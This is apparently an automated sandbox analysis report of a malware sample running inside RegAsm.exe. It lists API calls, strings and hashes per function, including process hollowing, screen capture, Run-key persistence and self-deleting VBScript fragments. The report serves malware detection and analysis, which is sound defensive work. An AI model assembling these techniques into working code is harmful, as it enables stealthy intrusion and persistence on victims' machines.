                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID: lJD
                                                        • API String ID: 1084509184-3316369744
                                                        • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                        • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                                        • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                        • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID: lJD
                                                        • API String ID: 1084509184-3316369744
                                                        • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                        • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                                        • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                        • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: GetLocaleInfoEx
                                                        • API String ID: 2299586839-2904428671
                                                        • Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                        • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                                        • Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                        • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                        • HeapFree.KERNEL32(00000000), ref: 004120EE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$FreeProcess
                                                        • String ID:
                                                        • API String ID: 3859560861-0
                                                        • Opcode ID: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                                        • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                                        • Opcode Fuzzy Hash: f8b7229bde56183a56125516245bdcff620dba8344b2748e8b36a977d3a4176b
                                                        • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00434C52 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FeaturePresentProcessor
                                                        • String ID:
                                                        • API String ID: 2325560087-0
                                                        • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                        • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                        • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                        • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                        • String ID:
                                                        • API String ID: 1663032902-0
                                                        • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                        • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                                        • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                        • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                        • String ID:
                                                        • API String ID: 2692324296-0
                                                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                        • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                        • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                        • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                        • String ID:
                                                        • API String ID: 1272433827-0
                                                        • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                        • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                                        • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                        • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                        • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                        • String ID:
                                                        • API String ID: 1084509184-0
                                                        • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                        • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                                        • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                        • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID:
                                                        • API String ID: 2299586839-0
                                                        • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                        • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                        • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                        • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                          • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                        • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                        • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                        • DeleteObject.GDI32(00000000), ref: 00418F30
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                        • DeleteDC.GDI32(00000000), ref: 00418F62
                                                        • DeleteDC.GDI32(00000000), ref: 00418F65
                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                        • GetIconInfo.USER32 ref: 00418FBD
                                                        • DeleteObject.GDI32(?), ref: 00418FEC
                                                        • DeleteObject.GDI32(?), ref: 00418FF9
                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                        • DeleteDC.GDI32(?), ref: 0041917C
                                                        • DeleteDC.GDI32(00000000), ref: 0041917F
                                                        • DeleteObject.GDI32(00000000), ref: 00419182
                                                        • GlobalFree.KERNEL32(?), ref: 0041918D
                                                        • DeleteObject.GDI32(00000000), ref: 00419241
                                                        • GlobalFree.KERNEL32(?), ref: 00419248
                                                        • DeleteDC.GDI32(?), ref: 00419258
                                                        • DeleteDC.GDI32(00000000), ref: 00419263
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                        • String ID: DISPLAY
                                                        • API String ID: 479521175-865373369
                                                        • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                                        • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                        • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                                        • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                        • ResumeThread.KERNEL32(?), ref: 00418435
                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                        • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                        • GetLastError.KERNEL32 ref: 0041847A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                        • API String ID: 4188446516-3035715614
                                                        • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                        • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                        • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                        • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                        • ExitProcess.KERNEL32 ref: 0040D7D0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                        • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                        • API String ID: 1861856835-332907002
                                                        • Opcode ID: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                                                        • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                        • Opcode Fuzzy Hash: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                                                        • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65B51986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                        • ExitProcess.KERNEL32 ref: 0040D419
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                        • API String ID: 3797177996-2557013105
                                                        • Opcode ID: f90a1b7fb6ddb8bcfd4c781e5951c9b58c69a0543b10567a2cebf66b5454372d
                                                        • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                        • Opcode Fuzzy Hash: f90a1b7fb6ddb8bcfd4c781e5951c9b58c69a0543b10567a2cebf66b5454372d
                                                        • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                        • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                        • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                        • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                        • lstrcatW.KERNEL32 ref: 00412601
                                                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                        • Sleep.KERNEL32(000001F4), ref: 00412682
                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                        • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                        • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                        • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                        • API String ID: 2649220323-436679193
                                                        • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                        • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                        • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
